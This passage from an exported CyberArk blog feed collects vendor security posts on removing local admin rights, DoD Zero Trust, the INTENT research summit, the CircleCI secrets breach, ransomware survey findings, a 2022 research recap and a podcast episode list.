  24. Downgrade drivers, versions and libraries, or force the use of known vulnerable protocols and programs
  25. Flash firmware to connected devices (e.g., disable LED on a camera or load modified firmware on to a PLC)
  26. Access security tokens and encryption keys
  27. Jump air gaps to access critical operational technology (OT) systems
  28. Access supervisory control and data acquisition (SCADA) control panels for critical infrastructure, then modify hardware parameters to disable safety sensors or cause hardware resonance
  29. And last but not least, choose their own adventure: Install, remove, access, read, exfiltrate, intercept, unpack, analyze, dump, encrypt, reconfigure, unload, load, enable, disable, execute or remotely execute, cause, force, flip, wipe, mess with and wreak havoc, while also hiding, concealing, dwelling, impersonating, watching, listening, spying, learning and preparing

TL; DR: Eliminate Local Admin Rights Across the Board

Didn’t read through all 29 (and counting) local admin superpowers? Here’s the bottom line: With full admin rights, even the most well-meaning, conscientious workforce user has too much control over your organization’s digital environment, putting critical data and systems (even your existing security stack) in jeopardy.

Not every action listed above requires admin rights, and some attacks will ultimately slip past some endpoint defense-in-depth layers. But assuming breach, eliminating local admin rights across the board and enforcing least privilege at the endpoint (and everywhere else) make it so much harder for attackers to achieve their goals that a majority will look elsewhere.

Removing local admin rights as a security measure is not going to be a revelation to you as a security pro, or to anybody even remotely associated with IT, for that matter. But if you’re anything like me, seeing so many risky possibilities in one place is helpful for making the step from understanding to action.

Now I know what you’re thinking. Restricting users to work under standard user accounts will have a profound positive impact on security, but if cutting admin privilege rights creates significant friction for users, your job will get even more difficult (not to mention the inevitable backlash from angry users).

Once bitten and twice shy, some IT folks even go as far as to say that removing local admin rights hurts an organization more than it helps it. And those who are not that radical probably had some different experiences based on their setup — maybe they just spend their day remoting into user machines to install a font or a printer, update a program or change the time zone. Or maybe they tried to force their way on to the users and eventually had to budge and give the local admin rights back.

All these challenges can be solved by a well-rounded endpoint privilege manager that can remove local admin rights and then, based on policies, elevate certain programs or tasks in a transparent manner so a user would never see a prompt or need to ask IT for assistance. And if they have some special case, users can request elevation, which can be approved without ever remoting to the machine. On the backend, an effective endpoint privilege manager would even integrate with an IT ticketing system for smooth workflows and fast elevations (helpdesk teams, rejoice!).

Endpoint privilege managers are the cornerstone of the modern endpoint security stack, but not all solutions are created equal. A best-of-breed endpoint privilege manager will enable your organization to:

  • Remove local admin rights and enforce least privilege to reduce endpoint security vulnerabilities, then elevate end-user privileges on demand, in real time, with little or no helpdesk involvement.
  • Block ransomware by tightly controlling application permissions based on fine-grained, conditional business rules. Defend against other threats targeting and originating on endpoints.
  • Protect against credential theft by safeguarding credential stores, helping to contain attackers and reduce the attack blast radius.
  • Enhance the user experience by giving the right people and applications the right access to the right resources at the right times.
  • Satisfy audit and compliance requirements by making it easy to enforce and demonstrate policies.
  • Protect Windows, Windows Server, MacOS and Linux endpoints from hybrid to cloud environments, while extracting value from day one and realizing rapid ROI.

Need some more convincing that now is the time to remove local admin rights across your business? Explore this guide for key considerations and see how CyberArk Endpoint Privilege Manager can help your team strengthen endpoint security without complicating IT operations or impairing the user experience.

 

 

 

]]>
How Identity Security Addresses Key DoD Zero Trust Requirements https://www.cyberark.com/blog/how-identity-security-addresses-key-dod-zero-trust-requirements/ Fri, 20 Jan 2023 14:00:30 +0000 https://www.cyberark.com/?p=139293 How Identity Security Addresses Key DoD Zero Trust Requirements

The U.S. Department of Defense (DoD) is going all in on Zero Trust. In late 2022, the Pentagon released its long-anticipated Zero Trust strategy and roadmap for migrating “trusted” perimeter-based networks to a department-wide Zero Trust framework by fiscal year 2027. It’s an ambitious step for the nation’s largest employer of 3.4 million people, but it’s critical.

DoD Principal Deputy Chief Information Officer John B. Sherman didn’t mince words about the agency’s cybersecurity stance, writing, “Our adversaries are in our networks, exfiltrating our data, and exploiting the Department’s users.” This assume breach mindset goes hand-in-hand with the Zero Trust philosophy of denying access by default and verifying every identity – human and machine – to protect sensitive government assets and reduce the risk of data breach.

The DoD’s Zero Trust Strategy at a Glance

The DoD’s Zero Trust strategy calls for layered cybersecurity controls for existing IT infrastructure and cloud services to “reduce the attack surface, enable risk management and effective data-sharing in partnership environments, and quickly contain and remediate adversary activities.” It spans seven pillars and aligns to four high-level goals, shown below. Every agency within the DoD must implement baseline capabilities across these seven pillars to achieve compliance – or “targeted Zero Trust.” Certain organizations must implement more “advanced Zero Trust” capabilities based on system and information sensitivity.

DoD Zero Trust Pillars

Identity Security is a Must for Achieving Government-Wide Zero Trust

The DoD’s Zero Trust plan is part of a broader, government-wide push to strengthen defenses against constant and increasingly sophisticated attacks. In the spring of 2021, the White House issued an executive order outlining guidelines for modernizing and securing federal digital infrastructure. A Zero Trust architecture strategy followed in early 2022 that emphasized identity-centric security, without which “adversaries can take over user accounts and gain a foothold in an agency to steal data or launch attacks,” wrote authors.

Now comes the more difficult job of operationalizing Zero Trust, which requires a complicated mix of policies and technical controls, along with a massive cultural shift, to be successful. Fortunately, federal stakeholders and partners have the Zero Trust Reference Architecture (ZT RA), a prescriptive playbook developed by the Defense Information Systems Agency (DISA) and National Security Agency (NSA) to guide their efforts. Among its guiding principles is the “strict enforcement of identity-based authentication and authorization for all connections and access to infrastructure, data, and services.”

Addressing Key DoD Zero Trust Requirements with Identity Security Controls

Of course, identity isn’t the sole security focus in an agency’s Zero Trust journey, but it’s a big one. Modern Identity Security controls – centered on privilege controls and combining strengths of identity and access management (IAM)identity governance and administration (IGA) and privileged access management (PAM) – work in concert to mitigate the risk of advanced cyberattacks and meet many of the DoD’s Zero Trust requirements, while providing a strong Zero Trust foundation on which to grow:

Users. Adaptive multifactor authentication (MFA) paired with strong passwords secures identities and to authenticate the identity of every user – employee, partner or contractor. After login, these user identities can be revalidated to help ensure they should have access and reauthenticated for sensitive actions or after periods of inactivity.

Meanwhile, intelligent privilege controls make it possible to enforce least privilege – a Zero Trust “must” – consistently for both human and machine identities (i.e., service accounts) across any device, anywhere. Users only get only the permissions needed to perform a specific task, for just the right amount of time. And sessions – for both privileged and workforce users with high-risk access – are continuously monitored and analyzed to help agencies quickly detect and respond to threats.

Devices. User devices are gateways to highly sensitive government resources and prime targets for phishing and ransomware attacks. Identity Security controls make it possible to authorize user devices at each access request, and automatically detect security issues. Automated detection controls that block credential theft (via software abuse or memory scraping) are key to slowing down and containing attacks early on – before they circumvent other defensive layers and cause damage.

Networks and Environments. The traditional perimeter is dead, making “flat” networks even more dangerous. Creating credential boundaries makes it harder for attackers to get from “point A” to “point B,” and to their ultimate target. Session web session management for all users helps strengthen these boundaries and create extra layers of security. For instance, by isolating sessions to critical resources to prevent malware from spreading, and enforcing granular access control to improve individual accountability.

Applications and Workloads. The Zero Trust “never trust, always verify” mantra doesn’t just apply to people – especially since machine identities outnumber human identities 45:1. All calls from machine identities seeking access to network resources must be protected. Credentials should be managed and automatically retrieved, and access is securely granted to applications and bots – with the same robust Identity Security controls used for human identities. Likewise, secrets used across the DevOps pipeline must be managed appropriately to protect applications and the broader digital supply chain.

Visibility and Analytics. Thanks to advancements in artificial intelligence (AI), security teams can put analytics engines to work to better visualize, understand and detect their identity-centric risk profile. This gives them a simpler, more effective way to baseline typical user or device behavior, assign risk to each access event, automatically flag issues, identify protect and protect against of risky access conditions over time.

Automation and Orchestration. The vast number of human and machine identities across government networks today represent a greatly expanded attack surface that adds pressure to mounting compliance requirements. Implementing processes to automate the identity lifecycle through seamless, no-code application integrations and workflows can help agencies take control of excessive permissions to enforce least privilege and move closer to Zero Trust.

The DoD’s new Zero Trust strategy outlines clear requirements and timelines, and agencies need outcome-driven solutions to meet their Zero Trust charge. As the established industry leader, CyberArk offers the most complete and extensible Identity Security Platform, protecting identities and critical assets by enabling Zero Trust and enforcing least privilege. With multiple DoD customers and more than 130 installations across the U.S. federal government today, CyberArk stands ready to help government organizations secure sensitive data and infrastructure, fulfill their Zero Trust mandates and achieve mission success.

]]>
Zero-Days in RGB Keyboards, Top DID Network Exposed at INTENT Threat Research Summit https://www.cyberark.com/blog/zero-days-in-rgb-keyboards-top-did-network-exposed-at-intent-threat-research-summit/ Thu, 19 Jan 2023 20:24:53 +0000 https://www.cyberark.com/?p=139179 INTENT Threat Research Summit

Data breach headlines are daily reminders that cyberattackers keep innovating. While constant research to uncover threats and share crucial intelligence with defenders is far less visible, the second annual INTENT Summit offered a glimpse.

Together with our friends at Checkmarx, CyberArk recently welcomed global security researchers to Tel Aviv to “go down the rabbit hole” and explore today’s most fascinating cybersecurity challenges.

I may be a bit biased, but the event – for researchers, by researchers – was truly incredible. From the décor and music, to the missing vendor booths and life-sized bunny mascot (who had a creepy way of hopping out when you least expected it), the vibe was decidedly “un-security conference,” and buzzing with energy from start to finish. We demystified Tesla’s Bluetooth entry system, broke open-source CI/CD pipelines using code search and injection and shared embedded device security nightmares (and how to tackle them). We competed in an epic capture the flag challenge involving a robotic arm that danced and taunted the crowd, jammed out to a private Tuna concert and cheered for the World Cup finals together.

While I can’t possibly pick a favorite part, a few INTENT sessions stood out to me for their relevancy and potentially far-reaching security implications. If you’re an online gamer, or if the growing self-sovereign identity (aka decentralized identity) movement fascinates you, keep on reading.

Use an RGB Keyboard? Know the Potential Vulnerabilities (Literally) at Your Fingertips

Your computer keyboard isn’t likely to stick out when considering cybersecurity threats, but that may change after this discovery by Tal Lossos, security researcher at CyberArk Labs.

Many online gamers use RGB keyboards – advanced keyboards with colorful, customizable backlit LED lighting – as they battle virtual foes and construct new worlds. There’s a lot to like: RBG keyboards are ergonomic, help boost actions per minute and contribute to an immersive experience. And in some popular models used in Linux environments, the underlying software could cause serious security problems.

Without getting overly technical, Linux operating systems are made up of two levels: User and kernel. The kernel level is privileged, with elevated levels of access that enable interaction with the computer and home to “kernel drivers” – modules that extend support to other hardware devices like your keyboard, mouse and headphones.

Because of the kernel’s high privileges, even the tiniest bug can pose major risks. And exploiting a vulnerability in a kernel driver (like the one used to configure macros on your keyboard) can be just as impactful as exploiting a bug in the kernel itself. You may not realize it, but every time you add a new accessory to your gaming set up, you load a new kernel driver into the kernel, which greatly expands the attack surface.

Lossos set out to find these kernel-level vulnerabilities, and came upon OpenRazer, an open-source software powering most products made by popular gaming peripherals manufacturer, Razer. Deeper analysis of this Linux kernel module revealed several zero-day flaws (CVE-2022-29021, CVE-2022-29022, CVE-2022-29023), including a buffer overflow vulnerability that could be potentially exploited to launch attacks from generic denial of service to full local privilege escalation (in other words, the attacker “owns” your entire system).

Here’s the wildest part: These vulnerabilities are determined by the user’s specific RGB color selections. CyberArk Labs submitted a patch as part of disclosure, but gaming enthusiasts and developers alike will be interested in the details, risk mitigation recommendations and Linux kernel bug hunting considerations highlighted in Lossos’ full INTENT talk and corresponding technical blog post.

RCE’ing Our Way Into the Decentralized Identity Blockchain

There’s a growing global movement toward decentralized identity (DID), in which individuals fully own and control their digital identities as they interact in cyberspace. It’s a fascinating visionary concept, yet it presents a boatload of new challenges, from getting people everywhere to change the way they operate (and take full responsibility for safeguarding their “keys to the kingdom”), standardization and technology constraints and, perhaps the biggest hurdle of all, securing the massive DID attack surface.

At INTENT, Shaked Reiner, principal security researcher at CyberArk Labs, dug into the technology behind DID implementations through the eyes of an attacker. He highlighted five distinct components of the identity attack surface: Blockchain code, private keys, post-authorization, trust-building and traditional “off the chain” systems, and ways they could all be exploited. But the bulk of his talk focused on a critical vulnerability (CVE-2022-31020, CVSS 10) unearthed during DID research involving the Hyperledger Indy-based DID network.

If you’re not familiar with it, Hyperledger Indy is a ledger designed to support identity operations. It’s used to run one of the largest DID networks in production today – Sovrin – along with several other prominent DID networks used by governments.

The vulnerability Reiner and team discovered allows an attacker to take over every node (used to validate transactions, write to the blockchain and read from it) in every Hyperledger Indy network. With this access, the attacker can practically own the consensus algorithm and impersonate any DID in the network.

This incredible research shows how important it is to embed security into the development process from the start and, especially in the case of decentralized identity, extend protections from code to every component involved. Explore Reiner’s decentralized identity 101 post, technical deep dive on the Sovrin vulnerability research and full INTENT talk to learn more.

Be sure to check out free on-demand INTENT sessions for more cutting-edge threat research. After all, enriching and inspiring the community is what INTENT is all about.

]]>
CircleCI Breach Exposes Risk of Hard-coded Secrets https://www.cyberark.com/blog/circleci-breach-exposes-risk-of-hard-coded-secrets/ Fri, 13 Jan 2023 21:03:50 +0000 https://www.cyberark.com/?p=138994 CircleCI Breach Exposes Risk of Hard-coded Secrets

The recent CircleCI breach highlights the risk of storing secrets in places like private code repositories (GitHub), scripts, configuration files, files encrypted at rest, CI/CD pipeline code or anywhere where they cannot easily be rotated, audited, authenticated and secured.

CircleCI is a leading continuous integration and continuous delivery (CI/CD) platform with over a million users. After a recent security breach, CircleCI is advising customers to “[i]mmediately rotate any and all secrets stored in CircleCI” and to “review internal logs for their systems for any unauthorized access.” CircleCI recommends that their customers do not store any “long-lived” credentials in CircleCI.

In addition, we recommend that organizations affected by the breach check for suspicious activity on any integrated SaaS applications and cloud providers, which could have been impacted.

The details are still developing however, what’s more important is how organizations can proactively prevent of this type of attack going forward. For those affected by this breach, highly privileged access for machine identities is now exposed via their secrets to potential attackers, making it difficult to know what the attackers might have access to. Companies impacted need to immediately rotate their secrets, but any secrets that are long-lived or embedded in code will require extra development time to manually find and rotate them.

The Problem With Hard-coded Secrets Applications and Scripts

Secrets are credentials such as passwords, SSH keys, API keys or any private information that grants access to protected resources. These secrets grant non-human/machine identities highly privileged access to sensitive company resources. Controlling the secret allows you to assume the non-human identity.

The most recent CyberArk Identity Security Threat Landscape Report shows that machine/non-human identities outnumber human identities by a factor of 45x, and 68% of non-humans have access to sensitive data and assets, highlighting the importance of protecting secrets and the non-human identities they represent.

To protect non-human identities, organizations should not directly embed secrets in application code, scripts, configuration files or in any static location where unauthorized users can read them or where they cannot quickly be rotated when needed during a security incident. One of the things to keep in mind is that if anyone gains access (authorized or unauthorized) to the source code, they also have access to anything the secrets protect. With that access, they can simply impersonate the identity of the non-human user that secret represents and leverage this identity to escalate privileges and expand the impact of the initial attack.

CircleCI isn’t alone. There are several high-profile breaches related to non-human access in the news recently. Therefore, the focus should be on how to mitigate the most risk and limit the spread of future attacks. Let’s look at some key lessons from this attack and other recent breaches:

  • Source code doesn’t stay secret: CircleCI isn’t alone. During the same week, Slack reported a “threat actor downloaded private code repositories” after a “limited number of Slack employee tokens were stolen and misused.” Thankfully, no “downloaded repositories contained customer data, means to access customer data.” Sadly, this isn’t the only high-profile leak of source code, but this proves that source code is a terrible place to keep secrets.
  • Attackers target secrets to escalate privileges: The Uber breach reported on September 19, 2022 was spread throughout the enterprise because hard-coded secrets embedded in a PowerShell script allowed the attacker to gain high-level access and escalate privileges. This breach is yet another good example of why you shouldn’t put secrets in code.
  • Development time is wasted rotating secrets: Developers everywhere are now busy searching their code and updating hundreds or thousands of secrets spread across their development and production environment. One developer on Reddit said, “there goes the rest of my week…My company deploy[s] several hundred websites through CircleCI, each with their own secrets…”

Why Developers Still Write Secrets into Source Code

Storing secrets in code is certainly not recommended, but many people sheepishly admit to seeing secrets in production code before, even if they personally would never do it. Some of the reasons for this are:

  • Test code improperly moved to production: The code was only meant to be part of a test application, sandbox environment or the secret was meant to be temporary (“I will remove it later”).
  • Lack of secure development training: The developer who wrote the code isn’t aware of the best practices for safely handling secrets in code.
  • False security assumptions: The developer falsely assumes the secrets are protected by something else like the code repository (GitHub) access controls, base64 encoding, Kubernetes Secrets or encryption at rest only.

Attackers Are Gonna Attack, so Hunters Need to Hunt

Under constant cybersecurity threats, enterprises need to focus on what they can control to mitigate their risk and potential exposure. Because there is no well-defined IT perimeter, the threat landscape is now asymmetric, making a Zero Trust security mindset essential. Protecting non-human/machine identities and the secrets that represent them is critical to defending against the next attack. Any static credential or secret need to be removed from all scripts and source code. Security teams need to holistically manage access across the entire enterprise without silos or blind spots, with the ability to automatically rotate credentials as needed. A centralized secrets management system is the best option for authenticating, authorizing and auditing non-human access because it allows organizations to fully understand who has access to what and to automatically rotate or revoke access as needed.

 

Editor’s note, Jan. 17, 2022: After this blog post was published, CircleCI disclosed additional details on how the initial breach started – with malware on an employee laptop that allowed the attackers to keep the employee’s sessions open and active, without reauthorizing or running MFA precautions. This new information only underscores the importance of a holistic Identity Security strategy that stops breaches where they start – at the endpoints – by preventing credential, password, cookie and other types of tokens (especially post-MFA tokens) theft with a solution like CyberArk Endpoint Privilege Manager. A robust Identity Security solution also limits the blast radius of the initial phase of a breach by managing the secrets attackers frequently use to expand breaches deep into the heart of the enterprise.

]]>
Six Takeaways from Recent Ransomware Attacks https://www.cyberark.com/blog/six-takeaways-from-recent-ransomware-attacks/ Wed, 11 Jan 2023 17:00:50 +0000 https://www.cyberark.com/?p=138778

2022 ransomware attack learnings can inform 2023 cybersecurity strategies, helping organizations combat threats and reduce risk with greater confidence.

The CyberArk 2022 Identity Security Threat Landscape Report shows the ransomware attack vector continues to be a cybercrime hot spot, but the scale is staggering: 73% of global IT security decision-makers reported at least one ransomware attack on their organization in the last 12 months. Nearly 100% claim to have a defense-in-depth strategy in place to combat ransomware, which is encouraging. But since there’s always room for improvement, I dug into the data to understand what made some organizations more attractive to ransomware actors than others, and what is (and isn’t) working when it comes to ransomware prevention.

But first, a quick 2022 ransomware recap …

Ransomware was more prolific than ever in 2022, fueled by ransomware-as-a-service (RaaS) groups like ALPHV (BlackCat) and Black Basta, as well as the return of the infamous REvil organization.

The number of ransomware-based breaches grew by 41%, with attacks taking 49 days longer than average to identify and contain, according to IBM’s 2022 Cost of a Data Breach report. The same report found that destructive ransomware attacks increased by more than USD $430,000 in cost for victim organizations.

This sustained ransomware activity put increased pressure on supply chains, disrupted operations and caused reputational damage. Many organizations opted to pay ransoms despite widespread guidance against the practice. However, major incidents throughout 2022 underscored the fact that giving in to ransomware demands further perpetuates attacks.

99% of orgs accelerated digital initiatives

All the while, organizations ramped up digital and IT initiatives (continuing the tectonic shift called digital transformation), creating a massive surge in digital identities and expanding the attack surface. It only takes one compromised human or machine identity to launch an attack, and our data shows ransomware actors took full advantage of this by targeting companies of all sizes and sectors.

A ransomware attack analysis: Organizations in the crosshairs share six commonalities

Though ransomware attacks didn’t discriminate based on organizational size or sector, a deeper dive into the CyberArk 2022 Identity Security Threat Landscape Report reveals several notable differences between organizations targeted by ransomware attacks and those not targeted in the last 12 months:

1. Overly generous access provisioning. In targeted organizations, 56% of workforce users had access to sensitive corporate data, compared to only 39% in organizations not targeted. Seventy-five percent of targeted organizations granted non-human accounts/bots access to sensitive data; this percentage drops to 50% in organizations not targeted by ransomware attacks.

Organizations need more effective strategies to manage sensitive access and enforce least privilege to align with the Zero Trust “trust nothing, verify everything” philosophy.

75% of targeted orgs gave sensitive access to bots

2. Behind-the-curve cybersecurity investments. Eighty-two percent of security leaders in targeted organizations said their company prioritized business operations over robust cybersecurity in the last 12 months (70% of security leaders in non-targeted organizations agreed). Additionally, these security leaders were 13% more likely to say their recent cybersecurity decisions contributed to new areas of vulnerability.

Cybersecurity can’t take a back seat to digital investments because, ultimately, positive business and customer outcomes hinge on both.

3. More churn-related risk. Seventy-four percent of security leaders at targeted organizations agreed the accelerated rate of employee churn and termination caused security issues, compared to 52% of security leaders at non-targeted organizations.

When someone leaves an organization, their access must be deleted immediately and automatically, not left to periodic reviews.

4. Less cybersecurity confidence. Organizations that experienced ransomware attacks displayed less confidence about their cybersecurity overall. Security leaders were 22% more likely to say their organization was susceptible to carefully crafted attacks, such as phishing, and 27% more likely to say their organization cannot prevent attackers from accessing critical data and assets 100% of the time, compared to leaders at non-targeted organizations.

There’s no silver bullet for ransomware, but with an assume breach mindset, a strong defense-in-depth approach and an identity focus, organizations can confidently drive greater cyber resilience.

Targeted orgs less cyber confident

5. Irregular breach reporting. Both targeted (92%) and non-targeted (91%) organizations paid nearly the same amount of attention to revisiting their cybersecurity strategy and incident response planning. But that similarity ends when it comes to reporting on breaches. It’s alarming to see nearly three-quarters (71%) of targeted organizations (versus 39% of non-targeted) said they do not report successful data breaches to stakeholders, which places organizations at greater risk for non-compliance fines and penalties.

Prioritize transparent reporting and communication. Review cyber incident response strategies and playbooks rigorously and involve stakeholders in improving them.

6. Inadequate Identity Security controls to protect cloud assets. Significantly fewer targeted organizations (44%) had Identity Security controls in place to protect cloud infrastructures and workloads compared to non-targeted organizations (60%). This is despite more than half of respondents indicating their organization had accelerated cloud migration over the past year.

Don’t wait until your organization is drowning in cybersecurity debt to address cloud workload security and hold up your end of the Shared Responsibility Model. A proactive, automated approach today can help you avoid major issues tomorrow.

Interestingly, nearly 100% of both targeted and non-targeted groups said they had a defense-in-depth strategy in place, using multiple layers of security to reduce vulnerabilities, contain threats and mitigate risk. Yet there wasn’t broad consensus on the most effective defense-in-depth components, as shown below. What stood out to me is that slightly more targeted organizations view least privilege controls, application control and red teaming as most effective. This suggests security teams recognize (perhaps with the benefit of hindsight) that threat actors will seek out ways to circumvent MFA and other existing security controls, and are placing stronger emphasis on ways to minimize the blast radius of attacks.

These varied perspectives also remind us that ransomware defense isn’t just about technology. Even the most advanced detection tools can’t stop every piece of ransomware from running, every single time. Overall system hardening, systematic attack surface reduction, a consistent approach to asset security and fundamental (also called “basic” by security practitioners) security best practices, such as local admin rights removal, can dramatically improve an organization’s ability withstand a ransomware attack. Everyone and everything — people, processes and technology — play roles in effective (and realistic) ransomware prevention strategies that focus on stopping inevitable attacks before they cause harm.

As we move forward in 2023, consider how Identity Security countermeasures can help your organization improve ransomware readiness and reduce risk exposure. To delve deeper, read our full report findings — including respondents’ top five ransomware protection takeaways — in “Ransomware Attacks: What Can We Learn From Them?” And as a contributing partner of the EUROPOL European Cybercrime Centre’s NoMoreRansom Project, we also recommend browsing these ransomware FAQs, mitigation steps and free decryption tools.

 

 

 

]]>
CyberArk Labs’ 2022 Threat Research in Review https://www.cyberark.com/blog/cyberark-labs-2022-threat-research-in-review/ Tue, 03 Jan 2023 14:00:25 +0000 https://www.cyberark.com/?p=138416 CyberArk Labs’ 2022 Threat Research in Review

Cyber defenders need timely, accurate threat intelligence to protect their organizations. This is what drives our CyberArk Labs team to produce innovative research, expose new attack methods and encourage greater industry collaboration.

While there was no shortage of material to work with last year, here’s a quick look at CyberArk Labs’ 2022 threat research highlights reel:

1. Analyzing Conti Group TTPs and Why They Matter

In 2022, the Ukraine conflict drove increased attacks against critical infrastructure – including those using destructive HermeticWiper malware – along with deeper scrutiny of certain criminal gangs. After a Conti ransomware group member leaked troves of sensitive inside information, CyberArk Labs was one of the first to analyze content on the group’s tactics, techniques and procedures (TTPs) and their significance. Within a few months of the leak, Conti disbanded, though many of its former members are still at work today.

2. Extracting Clear-Text Credentials From Chromium’s Memory

Attackers and credential-stealing malware often target browsers (which seemingly know everything about us) to compromise stored credentials and session cookies. If hijacked, these cookies could allow threat actors to bypass multifactor authentication (MFA) and single sign-on (SSO) and access critical business applications. In 2022, CyberArk Labs researchers discovered a new attack technique for extracting sensitive data from the Chromium browser’s memory and designed a credential protection plan to aid defenders.

3. Hunting for PwnKits in Linux

PwnKit vulnerability CVE-2021-4034 – a critical privilege escalation vulnerability in the Polkit Linux module – continues to generate significant attention nearly a year after public disclosure. Industry researchers and government agencies urge teams to address this critical flaw if they haven’t already. Security teams can use the PwnKit-Hunter tool to scan Linux-based machines for the Polkit vulnerability, and browse this library for other free threat hunting tools developed by CyberArk Labs.

4. Attacking RDP From the Inside: The Leaky Named Pipes Saga

RDP is an extremely popular protocol for remote access to Windows machines, and an ongoing focus area for CyberArk Labs. In early 2022, the team uncovered a vulnerability by abusing named pipes for smart card hijacking, unauthorized file system access to client machines and more. Our team reported the vulnerability to Microsoft in a coordinated disclosure process and a patch was released. However, CyberArk Labs identified an attack vector that was not addressed in the fix, making the vulnerability still exploitable under certain conditions. Learn more about this unconventional attack vector and the latest patch to address these findings.

5. Digging Into Decentralized Identity: The Good, the Bad and the Ugly

Years of problematic passwords and endemic identity fraud highlight the need for stronger, more secure authentication methods. Decentralized identity (DID) offers some exciting possibilities — but it also presents new attack surfaces. In this two-part research piece, CyberArk Labs explores key DID concepts, benefits and security considerations and a critical vulnerability uncovered in Sovrin, the most popular DID network in production.

6. Analyzing Malware: Exploring Matanbuchus and Fantastic Rootkits (and Where to Find Them)

Threat research and red teaming discoveries often lead to new detections, creating the need for new bypasses, in which more detections are often discovered… it’s a game that never ends. In parts one and two of CyberArk Labs’ malware analysis using hook heaps, stomps and return addresses, you’ll see why threat research is as much about the journey as it is about the destination. While you’re at it, take an inside look at the quirky Matanbuchus loader’s tricks and loading techniques. And finally, in this in-depth rootkits research, explore highly evasive malware, how rootkits are built and where to find them.

7. Abusing Terminal Emulators with ANSI Escape Characters

Speaking of threat research twists and turns, what started out as a project on terminal emulators took a sharp turn when CyberArk Labs discovered a remote denial of service (DoS) vulnerability by abusing a Windows system call indirectly. Things snowballed from there, with their research leading to nine total vulnerabilities in different terminals. Buckle up – you’re in for a wild ride.

8. Uncovering Weaknesses in Cloud-Native Tech Stacks

Many of CyberArk Labs’ 2022 projects focused on modern DevOps methods and potential areas of risk. For instance, the team discovered an insufficient permissions handling vulnerability in Docker engine during a Linux exploration. They also created a new open-source GUI tool, “RPCMon,” based on Windows container communication research, which can monitor RPC calls and show their function names. And, most recently, the team analyzed a vulnerability in Istio to help organizations better understand service mesh concepts, Istio gateways and how to avoid potentially dangerous caching pitfalls.

9. Trusting RPA Bots With Heavily Guarded Secrets: Have We Gone too Far?

Industries from healthcare to financial services use robotic process automation (RPA) to automate repetitive tasks and free up humans so they can focus on more meaningful work. But when they do, access credentials and secrets to enterprise applications are placed in the “hands” of robots. Can these RPA bots really be trusted? Our team dug in to find out. Here’s what they learned.

10. Researching Third-Party Linux Kernel Drivers: It’s All Fun and Games Until …

Since our CyberArk Labs team loves gaming almost as much as we love finding bugs, we recently analyzed an open-source Linux driver used to make popular gaming devices. We found a buffer overflow vulnerability that could be exploited to a denial of service and possibly elevation of privileges – a significant finding due to the vast number of product users around the world.

11. Strengthening the Cybersecurity Community as a CVE Numbering Authority

And finally, to further enhance our ability to share accurate, timely threat intelligence with the cybersecurity community, CyberArk Labs was designated by the CVE Program as a CVE Numbering Authority (CNA). As a CNA, CyberArk Labs is now authorized to assign CVE IDs to newly discovered vulnerabilities and publicly disclose information about these vulnerabilities through CVE Records. And we’re in great company: According to a SecurityWeek analysis, more than 50 new CNAs were added in 2022, bringing the total to 260 CNAs across 35 countries – all united by a shared commitment to advancing global cybersecurity collaboration.

What CyberArk Labs and the broader threat research community uncovered in the last 12 months may be just the tip of the iceberg – and why we can’t let up efforts to support ongoing awareness and cybersecurity vigilance. With 2022 in the rear view, we’re gearing up for an eventful year ahead. Read our 2023 cybersecurity predictions and follow the CyberArk Threat Research Blog for the latest CyberArk Labs projects.

]]>
Trust Issues Podcast: A 2022 Cyber Episodes Replay https://www.cyberark.com/blog/trust-issues-podcast-a-2022-cyber-episodes-replay/ Thu, 29 Dec 2022 14:00:37 +0000 https://www.cyberark.com/?p=138396 Trust Issues Podcast: A 2022 Cyber Episodes Replay

Since launching last spring, the CyberArk Trust Issues Podcast has covered a range of top-of-mind cybersecurity subjects. Whether you’re interested in CISO perspectives, cutting-edge threat research or best practices for advancing your Identity Security strategy, you can find them in our on-demand lineup of 2022 episodes. Check them all out below and stay tuned for new episodes dropping regularly.

EP 1: Talking Ransomware

Thanks to cheap plug-and-play ransomware kits, anyone with a credit card can get in on cyber extortion action. In the premier episode of Trust Issues, Andy Thompson, advisor and evangelist at CyberArk Labs, describes what attack commoditization means for defenders – and what they can do.

Listen Now

EP 2: Transhumanism: Charting the Cybersecurity Frontier

Digital identities are typically split into two distinct categories: Human and machine. But there’s one notable intersection: Cyborg. CyberArk technical evangelist, white hat hacker and CyberArk’s resident transhuman, Len Noe, explores the collision between human augmentation and cyber warfare.

Listen Now

EP 3: Restoring Trust in Healthcare

Trust is central to every healthcare interaction – between patients and clinicians and across interconnected IT ecosystems. Mike Towers, chief digital trust officer at Takeda Pharmaceuticals, talks about tech’s role in building transparent, equitable healthcare systems and driving better outcomes for all.

Listen Now

EP 4: How Diversity Can Help Combat Attacker Innovation

Combatting attacker innovation with innovation is only possible through collaboration and diversity of thought and backgrounds. Melissa Carvalho, vice president of identity and access management at Royal Bank of Canada, describes the importance of diversity and inclusion in cybersecurity.

Listen Now

EP 5: Preparing for the Cyber Unknown

How do you prepare for the unknown – for that metaphorical “Iron Mike” punch to the face? And what do you do when it happens? Shay Nahari, vice president of red team services at CyberArk challenges traditional ways of thinking to help teams see things differently and get ready for anything.

Listen Now

EP 6: Protecting Critical Infrastructure

Securing critical infrastructure that powers our modern way of life can be a sleepless job, as Carla Donev, vice president and CISO at NiSource, knows well. She describes the evolving threat landscape and how building safer, more resilient operations is key to preserving trust.

Listen Now

Ep 7: Cyber Attack Cycle Deconstruction

Meet Lavi Lazarovitz, head of security research at CyberArk Labs. He deconstructs an attack cycle, examines post-exploit methods and gets inside an attacker’s mind to help defenders understand what they’re up against – so they can stay a step ahead.

Listen Now

Ep 8: Seeing the Big Picture with Identity Security

Today, machine identities outnumber human identities by 45:1, and any one of these identities can be compromised by an attacker. CyberArk Founder, Chairman and CEO Udi Mokady speaks about the growing urgency to address this identity challenge with an impactful, unified security approach.

Listen Now

EP 9: Living and Breathing Telecom Trust

Thomas Tschersich, chief security officer of Deutsche Telekom (parent company of T-Mobile) and chief technical officer of Telekom Security, breaks down the new rules of data privacy and protection and how telecommunication providers must live and breathe trust as they operate critical infrastructure.

Listen Now

EP 10: Skating to Where the Cyber Puck’s Going, Not Where it’s Been

Like sports, cybersecurity requires practice, strategy and anticipation. Clarence Hinton, chief strategy officer and head of corporate development at CyberArk, talks about looking toward the future and preparing for the unknown. Because it’s about skating to where the puck’s going – not where it’s been.

Listen Now

EP 11: Step Away From the QR Code and Listen to This

QR codes are accessible, easy to produce and, seemingly, here to stay. They’re also a perfect way for cyber criminals to snag your personal information. Len Noe returns to the podcast to share important safety tips, and what you need to know before scanning that code with your smartphone.

Listen Now

